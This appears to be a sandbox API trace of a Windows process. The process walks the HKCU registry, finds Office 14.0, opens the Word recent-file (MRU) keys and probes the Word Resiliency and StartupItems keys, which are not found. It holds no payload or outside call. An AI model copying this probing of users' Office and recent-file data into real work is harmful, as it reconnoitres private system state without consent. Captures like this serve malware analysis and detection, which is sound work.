[0086.580] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x14, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Java VM", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.580] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x15, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Keyboard", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.580] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x16, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MediaPlayer", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.580] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x17, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Microsoft Management Console", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.580] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x18, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MS Design Tools", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.580] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x19, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MSDAIPP", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.580] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1a, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MSF", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.580] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1b, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Multimedia", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.580] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1c, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Notepad", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.581] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1d, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Office", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.581] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1e, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OneDrive", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.581] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1f, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PeerNet", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.581] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x20, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Protected Storage System Provider", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.581] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x21, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="RAS AutoDial", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.581] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x22, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Remote Assistance", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.581] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x23, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Shared", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.581] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x24, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Shared Tools", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.581] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x25, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SideShow", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.581] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x26, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SkyDrive", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.581] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x27, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Speech", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.581] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x28, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SQMClient", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.581] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x29, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SystemCertificates", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.581] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2a, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VBA", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.582] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2b, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VisualStudio", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.582] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2c, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WAB", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.582] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2d, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="wfs", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.582] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2e, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.582] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2f, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Mail", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.582] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x30, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Media", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.582] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x31, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows NT", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.582] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x32, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Script", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.582] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x33, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Script Host", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.582] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x34, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Search", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.582] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x35, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Sidebar", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.582] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x36, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Wisp", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.582] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x3e0) returned 0x0
[0086.583] RegCloseKey (hKey=0x394) returned 0x0
[0086.583] RegQueryInfoKeyW (in: hKey=0x3e0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.583] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="11.0", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.583] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="12.0", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.583] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="14.0", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.583] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="15.0", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.583] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="16.0", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.583] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8.0", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.583] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Common", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.583] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Excel", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.583] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OneNote", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.583] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Outlook", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.583] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PowerPoint", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.583] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.583] RegOpenKeyExW (in: hKey=0x3e0, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x394) returned 0x0
[0086.584] RegCloseKey (hKey=0x3e0) returned 0x0
[0086.584] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.584] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Excel", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.584] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PowerPoint", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.584] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.584] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x3e0) returned 0x0
[0086.584] RegCloseKey (hKey=0x394) returned 0x0
[0086.584] RegQueryInfoKeyW (in: hKey=0x3e0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.584] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="File MRU", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.584] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Options", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.584] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Place MRU", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.584] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x0) returned 0x2
[0086.584] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.584] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppEvents", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.584] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Console", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.585] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Control Panel", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.585] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Environment", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.585] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EUDC", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.585] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Identities", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.585] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Keyboard Layout", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.585] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Network", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.585] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Printers", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.585] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Software", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.585] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.585] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Volatile Environment", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.585] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x0) returned 0x2
[0086.585] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.585] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppEvents", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.586] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Console", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.586] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Control Panel", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.587] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Environment", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
